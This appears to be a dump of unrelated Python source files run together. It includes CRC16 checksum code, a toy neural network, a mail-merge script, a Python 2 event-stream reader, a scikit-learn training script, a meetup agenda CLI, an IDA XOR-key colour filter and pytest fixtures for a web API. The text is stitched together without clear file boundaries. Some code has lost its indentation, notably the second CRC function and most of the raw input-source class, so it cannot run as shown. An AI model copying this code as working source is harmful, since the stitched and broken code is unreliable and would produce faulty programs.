    0xb5ea, 0xa5cb, 0x95a8, 0x8589, 0xf56e, 0xe54f, 0xd52c, 0xc50d,
    0x34e2, 0x24c3, 0x14a0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,
    0xa7db, 0xb7fa, 0x8799, 0x97b8, 0xe75f, 0xf77e, 0xc71d, 0xd73c,
    0x26d3, 0x36f2, 0x0691, 0x16b0, 0x6657, 0x7676, 0x4615, 0x5634,
    0xd94c, 0xc96d, 0xf90e, 0xe92f, 0x99c8, 0x89e9, 0xb98a, 0xa9ab,
    0x5844, 0x4865, 0x7806, 0x6827, 0x18c0, 0x08e1, 0x3882, 0x28a3,
    0xcb7d, 0xdb5c, 0xeb3f, 0xfb1e, 0x8bf9, 0x9bd8, 0xabbb, 0xbb9a,
    0x4a75, 0x5a54, 0x6a37, 0x7a16, 0x0af1, 0x1ad0, 0x2ab3, 0x3a92,
    0xfd2e, 0xed0f, 0xdd6c, 0xcd4d, 0xbdaa, 0xad8b, 0x9de8, 0x8dc9,
    0x7c26, 0x6c07, 0x5c64, 0x4c45, 0x3ca2, 0x2c83, 0x1ce0, 0x0cc1,
    0xef1f, 0xff3e, 0xcf5d, 0xdf7c, 0xaf9b, 0xbfba, 0x8fd9, 0x9ff8,
    0x6e17, 0x7e36, 0x4e55, 0x5e74, 0x2e93, 0x3eb2, 0x0ed1, 0x1ef0
]
def crc16_ccitt(data, crc=0):
    """Calculate the crc16 ccitt checksum of some data
    A starting crc value may be specified if desired. The input data
    may be a sequence of characters (string) or a byte string; the output
    is an integer in the range (0, 0xFFFF). No packing is done to the
    resultant crc value. To check the value a checksum, just pass in
    the data byes and checksum value. If the data matches the checksum,
    then the resultant checksum from this function should be 0.
    """
    tab = CRC16_CCITT_TAB # minor optimization (now in locals)
    for byte in data:
        # Generalization: iterating a Python 3 bytes object yields ints
        # already; character strings still need ord().
        value = byte if isinstance(byte, int) else ord(byte)
        crc = (((crc << 8) & 0xff00) ^ tab[((crc >> 8) & 0xff) ^ value])
    return crc & 0xffff
def _calculate_crc16ccitt(payload, seed=0):
crc = seed
for c in payload:
tmp_crc = crc
crc = ((tmp_crc >> 8)&0xFF) | (tmp_crc << 8)
crc ^= ord(c)
crc ^= (crc & 0xff) >> 4
crc ^= (crc << 8) << 4
crc ^= ((crc & 0xff) << 4) << 1
crc &= 0xFFFF
return chr(crc&0xff)+chr((crc&0xff00)>>8)
# Demo/self-test: print the CRC of "hello world" as two hex bytes.
# Parenthesized so the line is valid under both Python 2 and Python 3
# (the original print statement was Python-2-only).
print(' '.join('%02X' % ord(x) for x in _calculate_crc16ccitt('hello world')))
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 9 17:39:29 2020
@author: MenesesGHZ
"""
import numpy as np
import json
class ANN:
    """Single-layer linear network trained by plain gradient descent.

    Weights start at 1 so the initial prediction is the sum of the inputs.
    """
    def __init__(self,input_size=784,output_size=10):
        # One weight row per output neuron.
        self.weights = np.ones(shape=(output_size,input_size))
        self.output = np.zeros(shape=(output_size))
        self.alpha = 0.01  # learning rate
    def predict(self,x):
        """
        FORWARD PROPAGATION: output = W @ x.

        Vectorized replacement for the original per-element Python loops;
        numerically identical for exact inputs and O(n*m) in C instead of
        Python bytecode.
        """
        self.output = self.weights.dot(np.asarray(x, dtype=float))
        return self.output
    def train(self,data_x,data_y,prediction):
        """
        REDUCING THE ERROR: one gradient step on (prediction - data_y).
        """
        delta = np.asarray(prediction, dtype=float) - np.asarray(data_y, dtype=float)
        # Outer product replaces the original double loop over the matrix.
        weights_delta = np.outer(delta, np.asarray(data_x, dtype=float))
        self.weights = self.weights - weights_delta * self.alpha
    def save_weights(self,filename):
        """Serialize the weight matrix to <filename>.json."""
        with open(filename+".json","w") as file:
            file.write(json.dumps(self.weights.tolist()))
    def load_weights(self,filename):
        """Restore the weight matrix from <filename>.json."""
        with open(filename+'.json', 'r') as file:
            self.weights = np.array(json.load(file))
sl_file = "./Input/Letters/starting_letter.txt"
il_file = "./Input/Names/invited_names.txt"
PLACEHOLDER = "[name]"
# Read the letter template once, then the guest list.
with open(sl_file, 'r') as sl:
    starting_letter = sl.read()
with open(il_file, 'r') as il:
    invited_names_list = il.readlines()
# Write one personalised letter per invitee.
for name in invited_names_list:
    stripped_name = name.strip()
    new_letter = starting_letter.replace(PLACEHOLDER, stripped_name)
    with open(f"./Output/ReadyToSend/letter_for_{stripped_name}.txt", mode='w') as complete_letter:
        complete_letter.write(new_letter)
|
import flowio
import numpy
f = flowio.FlowData('001_F6901PRY_21_C1_C01.fcs')
# Reshape the flat event list into an (events, channels) matrix.
# NOTE(review): assumes f.events is laid out row-major per event — confirm
# against the flowio documentation.
n = numpy.reshape(f.events, (-1, f.channel_count))
|
import entities
from datastreams import namespaces
#from datastreams import dsui
import struct
import event_data
import cPickle
from ppexcept import *
import os
import socket
from select import poll, POLLIN
import time
# Layout of the magic number that begins every stream file.
magic_format = "I"
magic_size = struct.calcsize(magic_format)
# Magic values identifying each on-disk stream format.
rawmagic = 0x1abcdef1
raw2magic = 0x2abcdef2
picklemagic = 0xdeadbeef
# BUG FIX: struct.unpack returns a tuple, so the original xmlmagic could never
# compare equal to the unpacked integer in determine_file_type; take element 0.
# Also pack a byte string, which the "s" format requires on Python 3.
xmlmagic = struct.unpack(magic_format, struct.pack("=4s", b"<!--"))[0]
class InputSource:
    """Abstract base class for event-stream inputs.

    Subclasses implement open/read/close; read() returns one entity per call
    and a PipelineEnd marker at end of stream.
    """
    def __init__(self, name):
        self.name = name
    def get_name(self):
        # Human-readable identifier, usually the file name.
        return self.name
    def get_dependency(self):
        # Subclasses may return another input source that must be read first.
        return None
    def open(self):
        raise Exception("abstract")
    def read(self):
        raise Exception("abstract")
    def close(self):
        raise Exception("abstract")
    def seek(self, num):
        raise InputSourceException("Input source does not support seeking")
    def get_progress(self):
        # Percentage complete; 0.0 when progress cannot be determined.
        return 0.0
def determine_file_type(filename):
    """Identify a stream file by its leading magic number.

    Returns one of "raw", "raw2", "pickle" or "xml"; raises
    PostprocessException for an unrecognized magic value. The file is closed
    even if reading fails (the original leaked the handle on error).
    """
    f = open(filename, "rb")
    try:
        header = f.read(magic_size)
    finally:
        f.close()
    magic = struct.unpack(magic_format, header)[0]
    if magic == rawmagic:
        return "raw"
    if magic == raw2magic:
        return "raw2"
    elif magic == picklemagic:
        return "pickle"
    elif magic == xmlmagic:
        return "xml"
    else:
        raise PostprocessException("Unable to determine file type of file "+filename)
class RawInputSource(InputSource):
"""reads raw binary files written by DSKI/DSUI. hackish but works."""
def __init__(self, filename, local_edf_modules, infile=None, endless=False):
InputSource.__init__(self, filename)
self.local_ns = namespaces.get_admin_ns()
self.ns_event = self.local_ns["DSTREAM_ADMIN_FAM/NAMESPACE"].get_id()
self.histevent = self.local_ns["DSTREAM_ADMIN_FAM/EVENT_HISTOGRAM"].get_id()
self.counterevent = self.local_ns["DSTREAM_ADMIN_FAM/EVENT_COUNTER"].get_id()
self.intervalevent = self.local_ns["DSTREAM_ADMIN_FAM/EVENT_INTERVAL"].get_id()
self.ns_frag_event = self.local_ns["DSTREAM_ADMIN_FAM/NAMESPACE_FRAGMENT"].get_id()
self.chunkevent = self.local_ns["DSTREAM_ADMIN_FAM/DATA_CHUNK"].get_id()
self.formats = {
"event" : "QIIIIi",
}
self.sizes = {}
for k, v in self.formats.iteritems():
self.sizes[k] = struct.calcsize(v)
self.filename = filename
self.decoder = event_data.ExtraDataDecoder(local_edf_modules)
self.header = None
self.infile = infile
self.position = 0
self.totalsize = None
self.waiting_chunks = []
self.endless = endless
def get_progress(self):
if self.totalsize:
return (float(self.position) / float(self.totalsize)) * 100
else:
return 0.0
def declare_entity(self, fname, ename, desc, edf, etype, aid):
ns = namespaces.Namespace()
eid = 0
if etype == namespaces.EVENTTYPE:
espec = namespaces.EventSpec(fname, ename, desc, edf, aid)
elif etype == namespaces.COUNTERTYPE:
espec = namespaces.CounterSpec(fname, ename, desc, aid)
elif etype == namespaces.INTERVALTYPE:
espec = namespaces.IntervalSpec(fname, ename, desc, aid)
elif etype == namespaces.HISTOGRAMTYPE:
espec = namespaces.HistogramSpec(fname, ename, desc, edf, aid)
ns.add_entity(espec)
# merge this created namespace (that just defines one entity)
# with our local namespace, which will give us proper id numbers
# for family and entity
conf, new_ns = self.local_ns.merge(ns)
return new_ns
def read(self):
retval = entities.PipelineEnd()
try:
retval = self.__read()
except PostprocessException, e:
print self.name, "file corruption: ", e
return retval
def __read(self):
#The name of the machine the data was collected on
machine = self.header["hostname"]
#dsui.event("INPUTS","RAW_INPUT_READ");
while True:
for evt in self.waiting_chunks:
cid = evt.get_cid()
seq = evt.get_sequence()
if self.decoder.has_cached_data(cid, seq):
self.waiting_chunks.remove(evt)
evt.extra_data = self.decoder.get_cached_data(cid, seq)
return evt
event_binary = self.infile_read(self.sizes["event"])
if len(event_binary) < self.sizes["event"]:
# end of stream reached
if self.endless:
# XXX hack for online postprocessing
continue
else:
return entities.PipelineEnd()
event_record = struct.unpack(self.formats["event"],
event_binary)
tsc, seq, aid, tag, pid, datalen = event_record
#print "decoded record", event_record, cid_to_ids(aid)
try:
cid = long(aid)
event_spec = self.local_ns[cid]
except KeyError:
print self.local_ns.to_configfile()
print self.local_ns.keys()
raise InputSourceException("Unknown composite id "+
`cid`)
timeval = {
"tsc" : entities.TimeMeasurement("tsc", tsc,
machine, 0, 0),
"sequence" : entities.TimeMeasurement("sequence",
seq, self.filename, 0, 0)
}
edf_name = event_spec.get_edf()
wait_flag = False
if datalen > 0:
extra_data_binary = self.infile_read(datalen)
elif edf_name and self.decoder.has_cached_data(cid, seq):
extra_data_binary = self.decoder.get_cached_data(cid, seq)
elif edf_name:
extra_data_binary = None
if datalen == -1:
wait_flag = True
if cid == self.chunkevent:
self.decoder.decode_chunk(extra_data_binary)
continue
if edf_name and (extra_data_binary != None):
try:
extra_data = self.decoder.decode(edf_name,
extra_data_binary)
except Exception, ex:
print "Failed to decode extra data for",self.local_ns[cid]
raise
else:
extra_data = None
if cid == self.counterevent:
entity = entities.Counter(
extra_data["raw_cid"],
timeval,
extra_data["count"],
entities.get_tsc_measurement(
extra_data["first_update"],
machine),
entities.get_tsc_measurement(
extra_data["last_update"],
machine), pid)
elif cid == self.histevent:
entity = entities.Histogram(
extra_data["raw_cid"],
timeval,
extra_data["lowerbound"], extra_data["upperbound"],
extra_data["num_buckets"], pid)
entity.populate(extra_data["underflow"],
extra_data["overflow"],
extra_data["sum"],
extra_data["num_events"],
extra_data["min_seen"],
extra_data["max_seen"],
extra_data["buckets"])
elif cid == self.intervalevent:
starttime = {
"tsc" : entities.TimeMeasurement("tsc",
extra_data["start_time"], machine, 0, 0),
}
entity = entities.Interval(
extra_data["raw_cid"],
starttime, timeval, tag, pid);
else: # event
if cid == self.ns_frag_event:
ns_frag = self.declare_entity(
extra_data["family_name"],
extra_data["entity_name"],
extra_data["desc"],
extra_data["edf"],
extra_data["type"],
long(extra_data["aid"]))
return entities.Event(self.ns_event, timeval, tag, ns_frag, pid)
elif cid == self.ns_event:
raise Exception ("your input file is too old")
c, new_ns = self.local_ns.merge(extra_data)
for z in new_ns.values():
self.aid_index[z.get_id()] = z.get_id()
for old_cid, new_cid in c.items():
self.aid_index[old_cid] = new_cid
entity = entities.Event(cid, timeval, tag, extra_data, pid)
entity.namespace = self.local_ns
if wait_flag:
self.waiting_chunks.append(entity)
continue
return entity
def open(self):
if not self.infile:
self.totalsize = os.stat(self.filename).st_size
self.infile = open(self.filename, "rb")
self.read_binary_header()
def infile_read(self, size):
self.position = self.infile.tell()
return self.infile.read(size)
    def read_binary_header(self):
        """Read the fixed-size binary header at the start of the stream.

        Layout "IIIIII80s": six unsigned ints followed by an 80-byte
        NUL-padded hostname.  h[0] is unpacked but unused -- presumably a
        magic/version field; confirm against the writer.
        """
        fmt = "IIIIII80s"
        header_binary = self.infile_read(struct.calcsize(fmt))
        h = struct.unpack(fmt, header_binary);
        # Record the producer's primitive type sizes so platform-dependent
        # fields can be decoded correctly later.
        self.header = {
            "sz_int" : h[1],
            "sz_long" : h[2],
            "sz_short" : h[3],
            "sz_long_long" : h[4],
            "sz_ptr" : h[5],
            "hostname" : h[6].strip('\x00'),
        }
    def close(self):
        """Close the input file, reporting events that were held back
        because their extra data never arrived."""
        if self.waiting_chunks:
            print self.filename,"ERROR",(len(self.waiting_chunks)),"events were held back due to missing/incomplete extra data"
            for e in self.waiting_chunks:
                print e
        self.infile.close()
        pass
# used to generate unique names for socket input sources, since there
# will be multiple ones for SMP hosts
# Maps hostname -> index of the most recently created source for that host.
socket_dictionary = {}
class SocketRawInputSource(RawInputSource):
def __init__(self, host, port, local_edf):
if host not in socket_dictionary:
socket_dictionary[host] = 0
else:
socket_dictionary[host] = socket_dictionary[host] + 1
id = socket_dictionary[host]
RawInputSource.__init__(self, `host`+"-"+`id`, local_edf)
self.host = host
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def open(self):
print "Connecting to",self.host,self.port
self.sock.connect((self.host, self.port))
print "Connected"
self.infile = self.sock.makefile('r')
read_binary_header()
def __del__(self):
self.close()
def close(self):
self.infile.close()
self.sock.close()
from datastreams import dski
class OnlineRawInputSource(RawInputSource):
    """Raw input source reading a live (still growing) trace file, using
    poll() to wait for more data instead of stopping at EOF."""
    def open(self):
        if not self.infile:
            self.totalsize = os.stat(self.filename).st_size
            self.infile = open(self.filename, "rb")
            # poll/POLLIN presumably come from the select module imported
            # elsewhere in this file -- confirm.
            self.pollobj = poll()
            self.pollobj.register(self.infile.fileno(), POLLIN)
            # Seed the local namespace from the live dski context.
            ctx = dski.dski_context(None)
            self.local_ns.merge(ctx.ns)
            ctx.close()
            self.header = {}
            self.header["hostname"] = "localhost"
            # Ensure the namespace event is emitted exactly once by read().
            self.ns_sent = False
    def read(self):
        """Return the next entity; the first call emits the namespace event."""
        if not self.ns_sent:
            self.ns_sent = True
            return entities.Event(self.ns_event,
                      entities.get_zero_timedict(),
                      2337, self.local_ns)
        return RawInputSource.read(self)
    def infile_read(self, size):
        """Read *size* bytes, waiting up to 1s for more data on a short read."""
        ret = self.infile.read(size)
        if not ret:
            v = self.pollobj.poll(1000)
            # NOTE(review): retries exactly once after the poll; a partial
            # read here is passed through to the caller.
            return self.infile.read(size)
        else:
            return ret
class PickleInputSource(InputSource):
    """Reads 'cooked' binary files written by postprocess2."""
    def __init__(self, filename):
        InputSource.__init__(self, filename)
        self.filename = filename
    def open(self):
        # Skip the magic number before handing the stream to the unpickler.
        self.infile = open(self.filename, "rb")
        self.infile.read(magic_size)
        self.unpickler = cPickle.Unpickler(self.infile)
    def close(self):
        self.infile.close()
    def read(self):
        """Return the next pickled entity from the stream."""
        return self.unpickler.load()
class XMLInputSource(InputSource):
    """Placeholder for XML input; constructing one always raises."""
    def __init__(self, filename):
        InputSource.__init__(self, filename)
        self.filename = filename
        raise Exception("XML input unimplemented")
    def open(self):
        pass
    def close(self):
        pass
    def read(self):
        pass
class PipelineInputSource(InputSource):
    """Input source fed by the output queue of another pipeline on this node."""
    def __init__(self, pipename, outputname, queue_param, pipe_index, our_pipe):
        # Name encodes producer/output -> consumer, for diagnostics.
        n = pipename+"/"+outputname+"->"+our_pipe.get_name()
        InputSource.__init__(self, n)
        self.other_pipe_name = pipename
        self.output_name = outputname
        self.pipe = our_pipe
        self.node = our_pipe.get_node()
        self.input_queue = None
        self.queue_param = queue_param
        self.pipe_index = pipe_index
        self.deps = None
    def get_dependency(self):
        # Upstream pipeline name, or None until open() has connected.
        return self.deps
    def read(self):
        # Blocks until the upstream pipeline produces the next entity.
        e = self.input_queue.get()
        return e
    def close(self):
        pass
    def open(self):
        """Connect to the upstream pipeline's output queue if it is local.

        Remote (cross-node) connection is not implemented -- see the
        CORBA comment below.
        """
        if self.node.has_pipeline(self.other_pipe_name):
            p = self.node.get_pipeline(self.other_pipe_name)
            self.input_queue = p.connect(self.get_name(),
                                 self.output_name,
                                 self.queue_param, self.pipe_index)
            self.deps = self.other_pipe_name
            return
        # do CORBA magic....
        pass
def ns_id_generator():
    """Yield successive integer ids starting at 1."""
    counter = 1
    while True:
        yield counter
        counter += 1
# Shared generator of unique ids used to name NamespaceInputSource objects.
ns_id_gen = ns_id_generator()
class NamespaceInputSource(InputSource):
    """Used to inject user-supplied namespaces"""
    def __init__(self, ns):
        # Backticks are Python 2 repr(); every instance gets a unique "ns<N>" name.
        InputSource.__init__(self, "ns"+`ns_id_gen.next()`)
        self.local_ns = namespaces.get_admin_ns()
        self.nsevent = self.local_ns["DSTREAM_ADMIN_FAM/NAMESPACE"].get_id()
        # Accept either namespace file path(s) or an in-memory config object.
        if type(ns) is str or type(ns) is list:
            self.ns = namespaces.read_namespace_files(ns)
        else:
            v = namespaces.verify_namespace_config(ns)
            self.ns = namespaces.construct_namespace(v)
    def open(self):
        pass
    def close(self):
        pass
    def read(self):
        """Emit the namespace as one admin event, then end the pipeline."""
        # self.ns is consumed by the first call; subsequent reads terminate.
        if not self.ns:
            return entities.PipelineEnd()
        e = entities.Event(self.nsevent, entities.get_zero_timedict(),
            0, self.ns)
        self.ns = None
        return e
|
import argparse
import pandas as pd
from sklearn.preprocessing import StandardScaler, OrdinalEncoder
from sklearn.compose import ColumnTransformer
from sklearn.linear_model import LogisticRegression
from joblib import dump
import yaml
import logging
# Configure the root logger: timestamped, level-tagged messages at INFO level.
logging.basicConfig(
    format='%(asctime)s %(levelname)-8s %(message)s',
    level=logging.INFO,
    datefmt='%Y-%m-%d %H:%M:%S')
def read_data(name):
    """Load ./data/<name>_processed.csv, dropping rows whose result is 99
    (the sentinel for unknown outcomes)."""
    df = pd.read_csv('./data/' + name + '_processed.csv')
    return df[df['result'] != 99]
def read_yaml():
    """Load and return the model description from ./model/model.yaml."""
    with open('./model/model.yaml') as stream:
        return yaml.load(stream, Loader=yaml.FullLoader)
def transform_data(data, yaml):
    """Fit scaling/encoding transforms on the features, persist the fitted
    transformer, and return (X, y).

    Note: mutates *yaml* by adding a 'transformer' key with the saved
    transformer's filename.
    """
    frame = data.copy()
    features = frame.drop(columns='result')
    target = frame['result']
    transformer = ColumnTransformer([
        ('numerical_transformations', StandardScaler(), yaml['numerical_features']),
        ('categorical_transformations', OrdinalEncoder(), yaml['categorical_features'])
    ])
    transformer.fit(features)
    features = transformer.transform(features)
    dump(transformer, f'./model/{yaml["model_name"]}_transformer.joblib')
    yaml['transformer'] = f'{yaml["model_name"]}_transformer.joblib'
    return features, target
def train_model(X, y, yaml):
    """Fit a logistic regression with the configured hyperparameters,
    persist it under ./model/, and return the training accuracy."""
    clf = LogisticRegression(random_state=0, **yaml['hiperparameters'])
    clf.fit(X, y)
    dump(clf, f'./model/{yaml["model_name"]}.joblib')
    return clf.score(X, y)
if __name__ == '__main__':
    # CLI entry point: expects the dataset name (the prefix of
    # data/<name>_processed.csv) as the single positional argument.
    logging.info('Reading arguments')
    parser = argparse.ArgumentParser(description='Script for training score model.')
    parser.add_argument('data_name', type=str)
    args = parser.parse_args()
    name = args.data_name
    logging.info('Reading data')
    x = read_data(name)
    logging.info('Reading YAML file')
    config = read_yaml()
    logging.info('Transforming data')
    X, y = transform_data(x, config)
    logging.info('Data transformed')
    logging.info(f'Transformed saved as {config["model_name"]}_transformer.joblib')
    logging.info('Model training')
    score = train_model(X, y, config)
    logging.info(f'Model accuracy: {score*100:.2f}%')
    logging.info(f'Model saved as {config["model_name"]}.joblib')
|
import json
import click
import requests
import re
import arrow
def read_json(path):
    """Return the parsed contents of the JSON file at *path*."""
    with open(path) as handle:
        return json.load(handle)
def write_json(path, _dict):
    """Serialise *_dict* as JSON and write it to *path*, overwriting."""
    serialised = json.dumps(_dict)
    with open(path, "w") as handle:
        handle.write(serialised)
class Issue:
    """A talk proposal backed by a GitHub issue in EtherTW/talks.

    Fetches the issue via the GitHub API and parses the "### Abstract" and
    "### Language" sections out of the issue body.
    """
    def __init__(self, _id):
        url = "https://api.github.com/repos/EtherTW/talks/issues/{0}".format(
            _id)
        self.issue_url = "https://github.com/EtherTW/talks/issues/{0}".format(_id)
        self.content = requests.get(url).json()
        self.title = self.content["title"]
        self.body = self.content["body"]
        # ROBUSTNESS FIX: default the parsed sections so talk_info() cannot
        # raise AttributeError when an issue omits "Abstract" or "Language".
        self.abstract = ""
        self.language = ""
        for chunk in self.body.split("### ")[1:]:
            if chunk.startswith('Abstract'):
                self.abstract = chunk.split('\n', 1)[1].rstrip()
            elif chunk.startswith('Language'):
                self.language = self.extract_language(chunk)
        self.speaker = self.content['user']['login']
        self.time = 40  # minutes #TODO: get this info from issue
    @staticmethod
    def extract_language(string):
        """Return the first checked option ("- [x] ...") in *string*."""
        regex = r"- \[x\] (.*)\n"
        matches = re.finditer(regex, string)
        # NOTE(review): raises StopIteration when no box is checked --
        # confirm every Language section always has one checked item.
        return next(matches).group(1)
    def talk_info(self):
        """Return a formatted multi-line description of the talk."""
        return "{title}\n\nby {speaker}\n\n{abstract}\n\nLanguage: {language}\n\n{issue_url}".format(**self.__dict__)
class Event:
    """A meetup event described by a JSON file listing its talks."""
    def __init__(self, path):
        self.content = read_json(path)
        self.event_id = self.content["event"].split("/")[-1]
        self.issues = [Issue(_id=talk["issue"])
                       for talk in self.content["talks"]]
    def show_event(self):
        """Print every talk's details followed by a generated agenda."""
        start = arrow.utcnow().replace(hour=19, minute=0, second=0)
        agenda = Agenda(start=start)
        agenda.add_item("Networking", 30)
        for issue in self.issues:
            print(issue.talk_info())
            agenda.add_item(issue.title, issue.time)
            agenda.add_item("Break", 10)
            print("\n\n")
        print("\n\n")
        print(agenda.show_agenda())
class Agenda:
    """An ordered list of (title, duration) items rendered as a timetable."""
    def __init__(self, start):
        # *start* is an arrow-like time supporting .shift() and .format().
        self.agenda = []
        self.start = start
    def add_item(self, title, minutes):
        """Append an agenda item lasting *minutes* minutes."""
        self.agenda.append([title, minutes])
    def show_agenda(self):
        """Return the agenda as "HH:mm - HH:mm<TAB> title" lines."""
        lines = ["Agenda\n"]
        cursor = self.start
        for title, minutes in self.agenda:
            finish = cursor.shift(minutes=+ minutes)
            lines.append("{0} - {1}\t {2}".format(
                cursor.format("HH:mm"), finish.format("HH:mm"), title))
            cursor = finish
        return "\n".join(lines) + "\n"
class MeetupAPI:
    """Thin Meetup API client scoped to the Taipei Ethereum Meetup group."""
    def __init__(self):
        # Get one from https://secure.meetup.com/meetup_api/key/
        with open('.api_key', 'r') as key_file:
            self.key = key_file.readlines()[0]
        self.host = "api.meetup.com"
        self.urlname = "Taipei-Ethereum-Meetup"
    def get_event_info(self, event_id):
        """Fetch and return the JSON description of *event_id*."""
        url = "https://{0}/{1}/events/{2}".format(
            self.host, self.urlname, event_id)
        return requests.get(url, params={"sign": "true"}).json()
@click.group()
def cli():
    """Root command group for the meetup helper CLI."""
@cli.command()
@click.argument('path')
def show(path):
    """Print the event stored at PATH, talks and agenda included."""
    print(Event(path).show_event())
@cli.command()
@click.argument('title')
def new(title):
    """Create an empty meetup JSON file named TITLE under ./meetups."""
    skeleton = {
        "event": "",
        "talks": []
    }
    write_json("./meetups/{0}.json".format(title), skeleton)
    click.echo("Create a new meetup at {0}".format(title))
if __name__ == '__main__':
    # Dispatch to the click command group when run as a script.
    cli()
|
from PyQt5.QtGui import qRgb
from idacyber import ColorFilter
from ida_kernwin import msg
from collections import Counter
class AutoXor(ColorFilter):
    """IDACyber colour filter that guesses a single-byte XOR key.

    Heuristic: the most common non-zero byte in the mapped buffers is taken
    as the key (assumes the plaintext is dominated by one byte value).
    Python 2 code: buffers are str, so bytes are 1-char strings.
    """
    name = "AutoXOR"
    def __init__(self):
        # Current key guess, its occurrence count, and total bytes scanned.
        self.key = 0x80
        self.occurence = 0
        self.size = 0
    def _update_key(self, buffers):
        """Re-estimate the XOR key from the mapped portions of *buffers*."""
        if buffers:
            tmp = ''
            for mapped, buf in buffers:
                tmp += buf if mapped else ''
            self.size = len(tmp)
            # NUL bytes are excluded so zero-padding doesn't win the vote.
            c = Counter(tmp.replace("\x00",""))
            mc = c.most_common(1)
            if len(mc):
                cur, self.occurence = mc[0]
                cur = ord(cur)
                # Only log when the guess actually changes.
                if cur != self.key:
                    msg('Key %02Xh - %d/%d (%.2f%%)\n' % (cur, self.occurence, self.size, float(self.occurence)/float(self.size)*100.0))
                    self.key = cur
    def on_process_buffer(self, buffers, addr, size, mouse_offs):
        """Return a colour per byte: mapped bytes XORed with the key and
        rendered as magenta intensity; unmapped bytes uncoloured."""
        colors = []
        self._update_key(buffers)
        for mapped, buf in buffers:
            if mapped:
                for c in buf:
                    c = (ord(c) ^ self.key) & 0xFF
                    colors.append((True, qRgb(c, 0, c)))
            else:
                for i in xrange(len(buf)):
                    colors.append((False, None))
        return colors
    def on_get_tooltip(self, addr, size, mouse_offs):
        """Return a summary of the current key guess, or None before any scan."""
        result = None
        if self.size:
            result = "Key %02Xh - %d/%d (%.2f%%)" % (self.key, self.occurence, self.size, float(self.occurence)/float(self.size)*100.0)
        return result
def FILTER_INIT(pw):
    """IDACyber entry point: instantiate and return the AutoXOR filter."""
    return AutoXor()
def FILTER_EXIT():
    """IDACyber exit hook; this filter holds no resources to release."""
    return None
"""Test HTTP API application
"""
import datetime
import json
import os
from unittest.mock import Mock
import pytest
import smif
from flask import current_app
from smif.data_layer.store import Store
from smif.exception import SmifDataNotFoundError
from smif.http_api import create_app
@pytest.fixture
def mock_scheduler():
    """Mock job scheduler whose get_status reflects well-known test names."""
    def get_status(arg):
        if arg == "model_never_started":
            return {"status": "unstarted"}
        elif arg == "model_started_and_running":
            return {
                "status": "running",
            }
        elif arg == "model_started_and_done":
            return {
                "status": "done",
            }
        # BUG FIX: was `arg in ("unique_model_run_name")` -- parentheses
        # without a comma make a plain string, so this was a substring test.
        elif arg in ("unique_model_run_name",):
            return {
                "status": "running",
            }
    attrs = {"get_status.side_effect": get_status}
    return Mock(**attrs)
@pytest.fixture
def mock_data_interface(
    model_run,
    get_sos_model,
    get_sector_model,
    get_scenario,
    get_narrative,
    get_dimension,
):
    """Mock Store whose read_* methods serve the fixture configs and raise
    SmifDataNotFoundError for the name 'does_not_exist'."""
    def read_model_run(arg):
        _check_exist("model_run", arg)
        return model_run
    def read_sos_model(arg):
        _check_exist("sos_model", arg)
        return get_sos_model
    def read_model(arg, skip_coords=False):
        _check_exist("sector_model", arg)
        return get_sector_model
    def read_scenario(arg, skip_coords=False):
        _check_exist("scenario", arg)
        return get_scenario
    def read_dimension(arg, skip_coords=False):
        _check_exist("dimension", arg)
        return get_dimension
    def _check_exist(config, name):
        # Mirrors the store's not-found behaviour for a reserved test name.
        if name == "does_not_exist":
            raise SmifDataNotFoundError("%s '%s' not found" % (config, name))
    # Plural read_* methods return one-shot lists; singular ones dispatch to
    # the helpers above so the not-found path can be exercised.
    attrs = {
        "read_model_runs.side_effect": [[model_run]],
        "read_model_run.side_effect": read_model_run,
        "read_sos_models.side_effect": [[get_sos_model]],
        "read_sos_model.side_effect": read_sos_model,
        "read_models.side_effect": [[get_sector_model]],
        "read_model.side_effect": read_model,
        "read_scenarios.side_effect": [[get_scenario]],
        "read_scenario.side_effect": read_scenario,
        "read_dimensions.side_effect": [[get_dimension]],
        "read_dimension.side_effect": read_dimension,
    }
    return Mock(spec=Store, **attrs)
@pytest.fixture
def app(request, mock_scheduler, mock_data_interface):
    """Yield a test app wired to the mocked store and scheduler."""
    fixtures_dir = os.path.join(os.path.dirname(__file__), "..", "fixtures", "http")
    test_app = create_app(
        static_folder=fixtures_dir,
        template_folder=fixtures_dir,
        data_interface=mock_data_interface,
        scheduler=mock_scheduler,
    )
    with test_app.app_context():
        yield test_app
@pytest.fixture
def app_fail(request, mock_scheduler, mock_data_interface):
    """Yield an app pointed at a missing fixtures dir, so templates 404."""
    missing_dir = os.path.join(os.path.dirname(__file__), "..", "fixtures", "404")
    test_app = create_app(
        static_folder=missing_dir,
        template_folder=missing_dir,
        data_interface=mock_data_interface,
        scheduler=mock_scheduler,
    )
    with test_app.app_context():
        yield test_app
@pytest.fixture
def client(request, app):
    """Return an API test client for the app fixture."""
    def teardown():
        pass
    request.addfinalizer(teardown)
    return app.test_client()
@pytest.fixture
def client_fail(request, app_fail):
    """Return a client whose home-page request will fail (missing template)."""
    def teardown():
        pass
    request.addfinalizer(teardown)
    return app_fail.test_client()
def parse_json(response):
    """Decode a Flask response body into Python data."""
    body = response.data.decode("utf-8")
    return json.loads(body)
def serialise_json(data):
    """Dump *data* to JSON, serialising datetimes via timestamp_serialiser."""
    return json.dumps(data, default=timestamp_serialiser)
def timestamp_serialiser(obj):
    """Serialise datetime objects to ISO 8601 (for json.dumps `default=`)."""
    if isinstance(obj, datetime.datetime):
        return obj.isoformat()
def test_hello(client):
    """The root page greets with a welcome message."""
    resp = client.get("/")
    assert "Welcome to smif" in str(resp.data)
def test_template_not_found(client_fail):
    """A clear error is shown when the app template is missing."""
    resp = client_fail.get("/")
    assert "Error: smif app template not found" in str(resp.data)
def test_get_smif(client):
    """GET smif details includes the package version."""
    body = parse_json(client.get("/api/v1/smif/"))
    assert body["data"]["version"] == smif.__version__
def test_get_smif_version(client):
    """GET the version endpoint returns the bare version string."""
    body = parse_json(client.get("/api/v1/smif/version"))
    assert body["data"] == smif.__version__
def test_model_runs(client, model_run):
    """GET the model-run collection."""
    resp = client.get("/api/v1/model_runs/")
    assert current_app.config.data_interface.read_model_runs.call_count == 1
    assert resp.status_code == 200
    assert parse_json(resp)["data"] == [model_run]
def test_model_runs_filtered_running(client, model_run):
    """GET model runs filtered by running status."""
    resp = client.get("/api/v1/model_runs/?status=running")
    assert resp.status_code == 200
    assert parse_json(resp)["data"] == [model_run]
